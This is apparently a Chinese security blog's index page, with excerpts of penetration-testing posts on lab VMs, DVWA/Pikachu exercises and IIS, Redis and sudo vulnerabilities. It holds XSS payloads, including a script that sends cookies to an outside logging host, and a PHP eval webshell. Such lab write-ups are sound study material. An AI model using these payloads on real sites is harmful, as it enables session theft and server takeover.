渗透学习
7Riven
Vouloir c'est pouvoir.
展开
-
靶机zico2练习:数据库插入反弹语句获取shell,脏牛提权,清除痕迹,留后门
1.主机发现2.端口扫描3.目录扫描4.端口访问尝试一下,含有文件包含漏洞5.访问扫描出来的目录发现登录端口,需要输入密码尝试弱口令admin登录成功信息查询,发现用户名、密码md5解密试试,root用户密码为:34kroot34zico用户密码为:zico2215@由于存在ssh服务端口,尝试连接...原创 2020-01-29 21:06:55 · 920 阅读 · 0 评论 -
靶机SickOs1.2练习:上传马文件菜刀连接/反弹shell,进行本地提权
1.主机发现2.信息扫描指纹信息3.端口访问该页面未发现有效信息尝试ssh弱口令连接,密码为root,直接提权成功!4.目录扫描未发现有效路径有一个test目录,访问看看点击文件,未发现有用信息方法一:可以尝试抓包,修改option为put,上传马文件,菜刀连接getshell上传成功!菜刀连接...原创 2020-01-13 22:06:59 · 1424 阅读 · 0 评论 -
靶机g0rmint练习:php一句话写入登录失败日志反弹shell,利用版本漏洞提权
1.主机发现2.端口扫描3.访问80端口看看果然404页面,看看robots.txt4.目录扫描用dirbuster扫描看看依次快速访问完目录后未发现有用信息,就先从登录界面仔细找找查看下源码直接访问试试,没什么结果扫描该目录下还有哪些文件只找到了一个,访问看看有一个压缩后门文件,尝试下载看看解压后如下:...原创 2020-01-07 00:13:32 · 613 阅读 · 0 评论 -
靶机Billu_b0x练习:通过目录扫描文件配置获取root信息,使用ssh服务连接提权
1.主机发现2.端口扫描3.访问80端口看看是一个登录窗口,未发现有效信息,尝试用sqlmap跑了一下,没什么结果4.目录扫描用kali自带的dirbuster扫描为更加全面考虑,用上dirb扫描依次访问看看可能存在文件包含,尝试看看/etc/passwd打开发现两个用户,分别是root、ica直接访问c.php是空白...原创 2020-01-03 23:16:16 · 522 阅读 · 0 评论 -
XSS触发语句小结
一、标准语句<script>alert(/XSS/)</script>二、尝试大小写<sCript>alert(1)</scRipt>三、使用<img>标签1、windows事件<img src="x" onerror=alert(1)><img src="1" onerror=eval("...转载 2020-01-01 21:12:51 · 2063 阅读 · 1 评论 -
会话固定漏洞小结——概念、原理、检测及防御
会话固定概念会话固定(Session fixation)是一种诱骗受害者使用攻击者指定的会话标识(SessionID)的攻击手段。这是攻击者获取合法会话标识的最简单的方法。会话固定也可以看成是会话劫持的一种类型,原因是会话固定的攻击的主要目的同样是获得目标用户的合法会话,不过会话固定还可以是强迫受害者使用攻击者设定的一个有效会话,以此来获得用户的敏感信息。原理访问网站时,网站会...原创 2019-12-29 21:43:31 · 6343 阅读 · 0 评论 -
会话劫持漏洞小结——cookie劫持的方式、属性、原理、危害及防御
会话劫持概念会话劫持(Session hijacking)是一种通过获取用户Session ID后,使用该Session ID登录目标账号的攻击方法,此时攻击者实际上是使用了目标账户的有效Session。会话劫持的第一步是取得一个合法的会话标识来伪装成合法用户。注:Session ID一般都设置在cookie步骤 目标用户需要先登录站点 登...原创 2019-12-29 21:32:46 · 4096 阅读 · 0 评论 -
靶机node练习:node.js框架的mogodb连接获取shell,通过Ubuntu16.04.3版本漏洞提权
主机发现端口信息扫描发现3000端口有node.js脚本,访问看看其他部分为发现有用信息,去login看看发现路径192.168.109.167:3000/api/users/……,尝试访问下有了重大发现,很明显正确的admin用户密码进行了md5加密,解一下得到用户名:myP14ceAdm1nAcc0uNT,密码:manchester,进行登录...原创 2019-12-27 23:19:32 · 571 阅读 · 0 评论 -
靶机DC-3练习:使用weevely生成webshell并连接获取shell,通过Ubuntu16.04版本漏洞提权
1.主机发现2.扫描端口服务版本3.访问80端口4.扫描后台目录分别访问,除了空白页、首页、就是404页面,只发现下面入口发现Joomla疑似cms,查看敏感文件搜索该版本cms有没有什么漏洞也可以用joomscan扫描……同样存在sql注入存在sql注入,根据路径查看文件5.直接使用sqlmap工具跑库名sql...原创 2019-12-25 23:17:59 · 1392 阅读 · 0 评论 -
靶机DC-2练习:通过rbash绕过获取shell,使用git命令提权
1.主机发现靶机IP地址:192.168.109.1632.扫描目标服务版本3.发现80端口,访问主页访问失败很显然,本地不解析该域名,在/etc/hosts文件中添加即可再次刷新网页单击首页左下角发现flag1:出现疑似用户名cewl,登录后找下一个flag网页其他模块未发现有效信息,接下来扫描一下后台目录4.工具扫描后台目...原创 2019-12-24 12:32:51 · 1827 阅读 · 1 评论 -
DNSlog注入
DNSlog注入产生测试一些网站的时候,一些注入都是无回显的,可以通过写脚本来进行盲注,但有些网站会ban掉我们的ip,可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入。DNSlog注入应用场景sql注入的盲注、无回显的命令执行、无回显的SSRFDNSlog注入原理有一个可以配置的域名(比如:ceye.io),然后通过代理商设置域名(ceye.io)...原创 2019-12-31 16:47:56 · 897 阅读 · 0 评论 -
靶机Lazysysadmin练习:samba服务连接发现共享文件用户信息、sudo命令提权、清除日志痕迹
攻击机IP地址1.目标主机发现netdiscover -i eth0 -r 192.168.109.0/24扫描开放端口:masscan --rate=10000 -p 0-65535 192.168.109.162确认端口开的服务:nmap -sV -T4 -O -p 445,22,3306,139,6667,80 192.168.109.1622.端口利用...原创 2019-12-16 15:18:20 · 491 阅读 · 0 评论 -
靶机DC-1练习:借助msfconsole进行漏洞查询利用getshell后,采用suid提权
1.靶机IP地址发现2.查看靶机版本和服务-sV:用来扫描目标主机和端口上运行的软件的版本 -p-:扫描0-65535全部端口 -sS/sT/sA/sW/sM:指定使用 TCP SYN/Connect()/ACK/Window/Maimon scans的方式来对目标主机进行扫描 -Pn:选项指示NMAP跳过默认的发现检查并对执行对目标的完整端口扫描。当扫描被阻止ping探针的防火...原创 2019-12-10 17:23:33 · 2500 阅读 · 0 评论 -
靶机Bulldog练习:通过python脚本远程连接弹出shell进行提权
1.主机发现方法一:netdiscover命令netdiscover -i eth0 -r 192.168.109.0/24 主动,不扫描本机IP地址netdiscover -p 被动,不容易被发现,只能扫到有交互的-i 指定网卡 -r 指定网段方法二:nmap命...原创 2019-12-09 14:52:38 · 876 阅读 · 0 评论 -
HTTP.sys远程执行代码漏洞验证及复现——CVE-2015-1635、MS15-034
目录漏洞概述漏洞环境部署漏洞验证漏洞利用:ms15_034漏洞防御漏洞概述HTTP.sys简介HTTP.sys是Microsoft Windows处理HTTP请求的内核驱动程序,为了优化IIS服务器性能,从IIS6.0引入,IIS服务进程依赖HTTP.sys。HTTP.sys远程代码执行漏洞实质是HTTP.sys的整数溢出漏洞漏洞成因远程执行代码漏洞存在于 ...原创 2019-12-07 23:05:52 · 20302 阅读 · 0 评论 -
IIS7.0 CGI解析漏洞环境部署及复现
环境部署IIS环境搭建:windows server 2008打开服务器管理器——添加角色配置处理程序映射:管理工具 –> IIS -> WIN-UNI00QR5JE0 -> 处理程序映射打开处理程序映射,选择添加模块映射确定网站处于开启状态漏洞产生的原因PHP配置文件php.ini中的参数cgi.fix_pathinfo参数默认等...原创 2019-12-06 21:11:48 · 620 阅读 · 0 评论 -
IIS6.0漏洞之解析漏洞复现及防御——文件解析、目录解析
漏洞成因IIS 6.0 在处理含有特殊符号的文件路径时会出现逻辑错误,从而造成文件解析漏洞。一般配合服务器的文件上传功能使用,以获取服务器的权限。IIS6.0在网站下对创建目录格式没有做严格的过滤限制措施,导致目录解析漏洞。漏洞类型文件解析漏洞、目录解析漏洞漏洞细节验证有哪些文件格式被IIS6.0当做asp格式执行? 从上述测试结果来看,IIS6.0下可...原创 2019-12-06 16:07:18 · 4156 阅读 · 0 评论 -
IIS6.0漏洞之CVE-2017-7269 远程代码执行漏洞复现及Poc验证
漏洞描述CVE-2017-7269:开启WebDAV服务的IIS 6.0被爆存在缓存区溢出漏洞导致远程代码执行漏洞产生的原因在Windows Server 2003的IIS6.0的WebDAV服务的ScStoragePathFromUrl函数存在缓存区溢出漏洞,在IIS 6.0处理 PROPFIND 指令的时候,由于对 url 的长度没有进行有效的长度控制和检查,导致执行memcpy对...原创 2019-12-06 13:30:09 · 3780 阅读 · 0 评论 -
IIS6.0漏洞之PUT上传
IIS简介IIS(Internet Information Services,互联网信息服务),是由微软公司提供的基于运行Microsoft Windows的互联网基本服务。最初是Windows NT版本的可选包,随后内置在Windows 2000、Windows XP Professional和Windows Server 2003一起发行,但在Windows XP Home版本上并没有II...原创 2019-12-04 20:22:24 · 1364 阅读 · 0 评论 -
CVE-2019-14287 (Linux sudo命令)漏洞复现
漏洞简介sudo命令:以系统管理者的身份执行指令,配置文件:/etc/sudoers漏洞形成的原因配置文件中明确表明不允许以 root 用户进行访问,但通过该漏洞,恶意用户或程序仍可在目标 Linux 系统上,以 root 用户身份执行任意命令。对应格式及注释如下:漏洞影响版本:sudo 1.8.28之前的所有版本漏洞修复:将sudo包更新至最新版本漏洞复现...原创 2019-12-04 11:43:18 · 602 阅读 · 0 评论 -
SSRF漏洞寻找、利用、绕过与防御、验证
目录1.SSRF简介2.漏洞寻找3.漏洞产生4.漏洞利用5.漏洞绕过6.漏洞防御7.验证SSRF1.SSRF简介SSRF概念SSRF(Server-Side Request Forgery,服务器端请求伪造)是一种由攻击者构造请求,利用服务器端发起的安全漏洞。SRF的类型显示攻击者的响应(Basic)不显示响应(Blind)SSRF攻击目标...原创 2019-12-03 17:06:57 · 3106 阅读 · 0 评论 -
文件上传小结——文件上传漏洞、文件上传校验姿势、文件上传绕过、文件包含漏洞、服务器解析漏洞……
文件上传:文件上传可以与文件包含相结合1.文件上传漏洞:文件上传漏洞需要的前提条件:能上传木马 上传的木马能执行 还要清楚上传后的路径一句话木马:<?php @eval($_POST[cmd]);?>eval 执行命令函数思路:编写一个一句话木马<?php?> 上传一句话木马 上菜刀图片马制作:找个图片,用记事本打开,添加一句话 ...原创 2019-12-02 10:39:14 · 647 阅读 · 1 评论 -
ms17-010 (永恒之蓝)漏洞复现及利用+Wireshark抓包分析
1.实验环境攻击机:Kali1)攻击工具:msf2)分析工具:wireshark3)IP地址:192.168.109.154(自动获取,NAT模式)靶 机:Windows71)版本2)开启网络共享(SMB协议)3)关闭防火墙4)IP地址:192.168.109.132(自动获取,NAT模式)2.测试攻击机与靶机的连通性3.数据库配置...原创 2019-12-03 00:30:04 · 5677 阅读 · 0 评论 -
Redis未授权访问漏洞利用及防护措施(非常详细)
靶机(centos6.6):192.168.109.150 攻击机(kali-linux 2019.3):192.168.109.148漏洞环境配置部署见:https://blog.csdn.net/qq_41210745/article/details/1033052621.nmap存活主机扫描2.发现疑似目标主机,扫描端口服务:找到目标端口63793.ka...原创 2019-11-29 17:52:12 · 11584 阅读 · 2 评论 -
Redis简介、安装与未授权访问漏洞环境部署
Redis介绍Remote Dictionary Server(Redis) 是一个由Salvatore Sanfilippo写的key-value存储系统。Redis是一个开源的使用ANSI C语言编写、遵守BSD协议、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。它通常被称为数据结构服务器,因为值(value)可以是 字符串(String),...原创 2019-11-29 12:18:44 · 1179 阅读 · 0 评论 -
DVWA系列之File Upload(文件上传)源码分析及漏洞利用
File UploadFile Upload,即文件上传漏洞,通常是由于对上传文件的类型、内容没有进行严格的过滤、检查,使得攻击者可以通过上传木马获取服务器的webshell权限。因此文件上传漏洞带来的危害常常是毁灭性的,Apache、Tomcat、Nginx等都曝出过文件上传漏洞。文件上传漏洞的利用是有限制条件:能够成功上传木马文件 上传文件必须能够被执行 上传文件的路径必须...原创 2019-11-28 14:37:21 · 1838 阅读 · 1 评论 -
DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用
什么是文件包含?程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无需再次编写,这种调用文件的过程一般被称为文件包含。文件包含漏洞的成因随着网站业务的需求,程序开发人员一般希望代码更灵活,所以将被包含的文件设置为变量,用来进行动态调用,但是正是这种灵活性通过动态变 量的方式引入需要包含的文件时,用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...原创 2019-11-27 16:55:29 · 1181 阅读 · 0 评论 -
DVWA系列之XSS(跨站脚本攻击)——DOM型XSS源码分析及漏洞利用
DOM型XSSDocument Object Model 文本对象模型xss、可能是存储型也可能是反射型、只决定于输出地方在反射型XSS中输入:<script>var img=document.createElement('img');img.src='http://192.168.232.130:88/log?'+escape(document.cookie);&...原创 2019-11-27 15:10:46 · 1380 阅读 · 1 评论 -
DVWA系列之XSS(跨站脚本攻击)——存储型XSS源码分析及漏洞利用
存储型XSS存储型XSS持久化,代码是存储在服芻器中的,如在个人信息或发表文章等地方,插入代码,如果没有过滤或过滤不严,那么这些代码将储存到服务器中,用户每次访问该页面的时候都会触发代码执行。这种XSS比较危险,容易造成蠕虫,盗窃 cookie1、hack插入恶意js2、服务器返回含有恶意js页面3、由于恶意js会一直存储在服务器端,所以每个目标点击含有恶意js页面都会跳转到第三方...原创 2019-11-27 12:26:58 · 1314 阅读 · 1 评论 -
DVWA系列之XSS(跨站脚本攻击)——反射型XSS源码分析及漏洞利用
XSSXSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行。XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSS。DOM型的XSS由于其特殊性,常常被分为第三种,...原创 2019-11-27 10:14:51 · 2495 阅读 · 0 评论 -
DVWA系列之CSRF(跨站请求伪造)源码分析及漏洞利用
CSRF(Cross-site request forgery)CSRF,全称Cross-site request forgery,跨站请求伪造,是指利用受害者尚未失效的身份认证信息(cookie、会话等),诱骗其点击恶意链接或者访问包含攻击代码的页面,在受害人不知情的情况下以受害者的身份向(身份认证信息所对应的)服务器发送请求,从而完成非法操作(如转账、改密等)。CSRF与XSS最大的...原创 2019-11-26 23:56:30 · 785 阅读 · 0 评论 -
DVWA系列之Command Injection(命令注入)源码分析及漏洞利用
Command InjectionCommand Injection,即命令注入,是指通过提交恶意构造的参数破坏命令语句结构,从而达到执行恶意命令的目的。 PHP命令注入攻击漏洞是PHP应用程序中常见的脚本漏洞之一,国内著名的Web应用程序Discuz!、DedeCMS等都曾经存在过该类型漏洞。命令执行产生原因命令执行漏洞是指应用有时需要调用一些执行系统命令的函数如: system()、...原创 2019-11-26 21:20:47 · 1947 阅读 · 4 评论 -
DVWA系列之Brute Force(暴力破解)源码分析及漏洞利用
Brute ForceBrute Force,即暴力(破解),是指黑客利用密码字典,使用穷举法猜解出用户口令,是现在最为广泛使用的攻击手法之一。字典本生成:http://tools.mayter.cn/目录low级别源码分析medium级别源码分析high级别源码分析...原创 2019-11-26 19:20:35 · 1926 阅读 · 1 评论 -
靶机bulldog2练习:通过反弹shell进行提权
环境:kali机一台:192.168.109.142、靶机bulldog2一台:192,168.109.149扫描网段:发现有主机IP地址为192.168.109.149,存活扫描发现目标的目标主机信息如下:-sV :版本探测 -sT :TCP connect()扫描 -sC :脚本扫描通过选项被激活 -p-:从端口1扫描到65535 -T5个级别:paranoid (0...原创 2019-11-22 17:38:24 · 952 阅读 · 0 评论 -
Pikachu漏洞平台练习——XXE实体类型举例、Blind OOB XXE、其他协议、XXE漏洞读取文件
1.XXE概述XXE-“xml external entity injection”,即xml外部实体注入。攻击者通过向服务器注入指定的xml实体内容,从而让服务器按照指定的配置进行执行,导致问题,也就是说服务端接收和解析了来自用户端的xml数据,而又没有做严格的安全控制,从而导致xml外部实体注入。2.本地实体类型与外部的实体类型本地实体类型举例说明如下:<?xml v...原创 2019-11-14 13:48:19 · 1476 阅读 · 0 评论 -
Pikachu漏洞平台练习——PHP序列化与反序列化、PHP反序列化漏洞
1.序列化serialize()与反序列化unserialize()序列化:把一个对象变成可以传输的字符串。 反序列化:把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。举例说明如下:<?phpClass a{Var $test = 'test';}$a = new a();Echo serialize($a);//序列化成为一个字符串形式$b=uns...原创 2019-11-13 12:27:59 · 1015 阅读 · 0 评论 -
Pikachu漏洞平台练习——Burte Force(暴力破解):基于表单暴力破解、验证码绕过(on server/client)、token爆破和源码分析
1.基于表单的暴力破解尝试输入用户名、密码结果如下:用户名或密码不存在源码分析:打开代理,使用burpsuite抓包,进行用户名和密码破解设置爆破项,添加$符号添加payload,如果有密码本可进行上传添加完成后,可根据需要是否在option中的选项修改线程数,另外需要进行grep-match单击右上角startattack,开...原创 2019-11-12 23:34:28 · 4021 阅读 · 0 评论 -
Nmap学习——目标主机、端口、操作系统和服务探测以及输出格式
1.nmap简介nmap是一个用于网络探测和安全/端口扫描的工具,全称Network Mapper(网络映射器),主要用来快速扫描大型网络,提供目标主机的各类信息,如:目标机的服务类型及状态、端口号、操作系统等信息。nmap语法格式:nmap [<扫描类型>…] [<选项>] {<扫描目标说明>}nmap识别6种端口状态:open(开放的), clo...原创 2019-11-11 15:48:18 · 8621 阅读 · 0 评论 -
IIS6.0漏洞之短文件名猜解复现
1.短文件名产生背景为了兼容16位MS-DOS程序,Windows为文件名较长的文件和文件夹生成了对应的DOS 8.3 短文件名。一般来说,文件名长度超过9位,就会显示短文件名 。2.短文件名命名格式全部大写 显示6位 超过6位用~1表示 不显示特殊字符 后缀最多显示三位,其余的被截断3.短文件名查看方式在window下的cmd中输入dir /x命令即可查看短文件名。如...原创 2019-11-10 22:20:39 · 1921 阅读 · 0 评论 -
常见端口漏洞及利用方式
序号 软件/服务名称 端口 类型 可能存在的漏洞/利用方式 1 Apache 80/8080 中间件 解析漏洞 目录遍历 任意文件上传 2 Apache Group ActiveMQ 8161 中间件 远程代码执行 3 Docker 2375 中...原创 2019-11-09 16:07:05 · 6405 阅读 · 0 评论